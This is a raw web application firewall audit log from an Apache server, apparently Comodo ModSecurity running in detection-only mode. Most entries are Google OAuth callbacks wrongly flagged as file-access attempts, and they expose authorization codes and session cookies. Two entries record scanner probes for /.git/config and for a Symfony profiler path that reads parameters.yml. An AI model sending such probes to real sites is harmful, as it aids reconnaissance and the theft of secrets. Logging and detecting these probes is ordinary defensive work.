"/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIIPoDzwUUVu1Y0WeVRAJgAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753354144300042 464392 (- - -) Stopwatch2: 1753354144300042 464392; combined=4456, p1=730, p2=3373, p3=113, p4=101, p5=138, sr=181, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d9bda378-Z-- --bd1af253-A-- [24/Jul/2025:13:54:01.841157 +0300] aIIQyYTiRAaWRFFxa-UaBgAAAM0 141.105.87.197 56022 127.0.0.1 7081 --bd1af253-B-- GET /administration/index.php?code=4/0AVMBsJjgTqkS-OcFTD_KTNWBw_H3uYZNCfJto6kwnmTJCu0FELVx1XJP4J7_BSDP6AA8Ew&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 141.105.87.197 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (Windows NT 6.1; rv:109.0) Gecko/20100101 Firefox/115.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 accept-language: en-US,en;q=0.5 accept-encoding: gzip, deflate, br referer: https://accounts.google.com/ upgrade-insecure-requests: 1 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: cross-site sec-fetch-user: ?1 cookie: PHPSESSID=ma37a0129ki2b7vmruoo53agc2 --bd1af253-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --bd1af253-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIIQyYTiRAaWRFFxa-UaBgAAAM0"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753354441407579 433711 (- - -) Stopwatch2: 1753354441407579 433711; combined=4839, p1=519, p2=3681, p3=118, p4=381, p5=139, sr=149, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bd1af253-Z-- --422ed448-A-- [24/Jul/2025:14:06:09.495373 +0300] aIIToTzwUUVu1Y0WeVRfAAAAAAY 18.236.104.120 39852 127.0.0.1 7081 --422ed448-B-- GET /.git/config HTTP/1.0 Host: sys.raversys.co.uk X-Real-IP: 18.236.104.120 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --422ed448-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Set-Cookie: csrf_cookie_name=02f45934550da2bd9ab1f4169d7799dd; expires=Thu, 24 Jul 2025 12:07:09 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --422ed448-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "sys.raversys.co.uk"] [uri "/.git/config"] [unique_id "aIIToTzwUUVu1Y0WeVRfAAAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sys.raversys.co.uk/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753355169461614 33842 (- - -) Stopwatch2: 1753355169461614 33842; combined=10941, p1=9098, p2=1722, p3=0, p4=0, p5=121, sr=1914, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --422ed448-Z-- --cb7fbc34-A-- [24/Jul/2025:14:06:59.716440 +0300] aIIT0zzwUUVu1Y0WeVRgxwAAAAk 212.28.242.188 49340 127.0.0.1 7081 --cb7fbc34-B-- GET /administration/index.php?code=4/0AVMBsJi9poC6miMc50aSgPl7L6KOco0iwbr-AB4iktxy8fucCQsW96VHT54v5I_j2FeiNQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=1&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.188 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9,ar;q=0.8 priority: u=0, i cookie: PHPSESSID=sqsemh12av2d8sbrpe98511au5 --cb7fbc34-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --cb7fbc34-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIIT0zzwUUVu1Y0WeVRgxwAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753355219260696 455946 (- - -) Stopwatch2: 1753355219260696 455946; combined=5994, p1=614, p2=4984, p3=118, p4=135, p5=142, sr=175, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cb7fbc34-Z-- --afe1ec25-A-- [24/Jul/2025:14:09:28.548187 +0300] aIIUaDzwUUVu1Y0WeVRm1wAAAAo 212.28.242.188 36556 127.0.0.1 7081 --afe1ec25-B-- GET /administration/index.php?code=4/0AVMBsJhGTXa1Y-kDhtTZCLOO7NM82UfoZr5AjosQdcspYDVZFcWssqC0WMVendj8a8e3kg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.188 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br accept-language: en-US,en;q=0.9 cookie: PHPSESSID=bo0opnv1rkmcjup9k6860hf4s0 --afe1ec25-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --afe1ec25-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIIUaDzwUUVu1Y0WeVRm1wAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753355368119653 428829 (- - -) Stopwatch2: 1753355368119653 428829; combined=6014, p1=787, p2=4738, p3=198, p4=57, p5=233, sr=291, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --afe1ec25-Z-- --3b222c26-A-- [24/Jul/2025:14:09:33.087724 +0300] aIIUbTzwUUVu1Y0WeVRm4gAAABY 45.82.255.188 32784 127.0.0.1 7081 --3b222c26-B-- GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.0 Host: internetlb.com X-Real-IP: 45.82.255.188 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3b222c26-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --3b222c26-H-- Message: Warning. Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Matched phrase "parameters.yml" at ARGS:file. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||internetlb.com|F|2"] [data "Matched Data: parameters.yml found within ARGS:file: app/config/parameters.yml"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "internetlb.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aIIUbTzwUUVu1Y0WeVRm4gAAABY"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "parameters.yml" at ARGS:file. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||internetlb.com|F|2"] [data "Matched Data: parameters.yml found within ARGS:file: app/config/parameters.yml"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "internetlb.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aIIUbTzwUUVu1Y0WeVRm4gAAABY"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'Primary script unknown' Apache-Handler: proxy:unix:/var/www/vhosts/system/internetlb.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753355373073455 14337 (- - -) Stopwatch2: 1753355373073455 14337; combined=3572, p1=710, p2=2557, p3=137, p4=42, p5=126, sr=188, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3b222c26-Z-- --a0e8463d-A-- [24/Jul/2025:14:12:07.678328 +0300] aIIVB4TiRAaWRFFxa-UpNAAAANU 195.112.198.68 43614 127.0.0.1 7081 --a0e8463d-B-- GET /administration/index.php?code=4/0AVMBsJg8M_IKcW_whcR7V5HwUh6JstM4XwU74ABftjkYe6dSNJFi5nqVns1BCp9_-VYS8A&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 195.112.198.68 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br accept-language: ar,en-US;q=0.9,en;q=0.8 cookie: PHPSESSID=cg1emd1u4viq18m8hmpmhu94c0 --a0e8463d-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --a0e8463d-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIIVB4TiRAaWRFFxa-UpNAAAANU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753355527265111 413419 (- - -) Stopwatch2: 1753355527265111 413419; combined=5745, p1=707, p2=4712, p3=140, p4=54, p5=132, sr=169, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a0e8463d-Z-- --fa255b50-A-- [24/Jul/2025:14:15:36.282281 +0300] aIIV1zzwUUVu1Y0WeVRx8wAAAAQ 212.28.242.188 47062 127.0.0.1 7081 --fa255b50-B-- GET /administration/index.php?code=4/0AVMBsJjLBMYZzsMLz4PvULGGVP7CLV_ceszjqqnkIBN_l8aeHH-WKe66ECWGZdiihpC5pA&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.188 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=vcnndks1rak1o2i3su8uci0f80 --fa255b50-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --fa255b50-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIIV1zzwUUVu1Y0WeVRx8wAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753355735820665 461921 (- - -) Stopwatch2: 1753355735820665 461921; combined=6061, p1=634, p2=5018, p3=218, p4=58, p5=133, sr=192, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fa255b50-Z-- --cebb645c-A-- [24/Jul/2025:14:29:12.374148 +0300] aIIZBzzwUUVu1Y0WeVSKfgAAABA 212.28.242.188 58196 127.0.0.1 7081 --cebb645c-B-- GET /administration/index.php?code=4/0AVMBsJiLi4mDNq_J6c9NzJ6XcqvgeQmFq80PBy0M5_nuIlv5NJvUf2JNa4hJreQS6_PQ3Q&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.188 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=21bpo7shvcragcdcm1a0pbtd05 --cebb645c-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --cebb645c-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIIZBzzwUUVu1Y0WeVSKfgAAABA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753356551937140 437274 (- - -) Stopwatch2: 1753356551937140 437274; combined=6299, p1=666, p2=5250, p3=138, p4=61, p5=183, sr=203, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cebb645c-Z-- --c58d1502-A-- [24/Jul/2025:14:33:54.426611 +0300] aIIaIjzwUUVu1Y0WeVSSKgAAAAI 212.28.242.188 39250 127.0.0.1 7081 --c58d1502-B-- GET 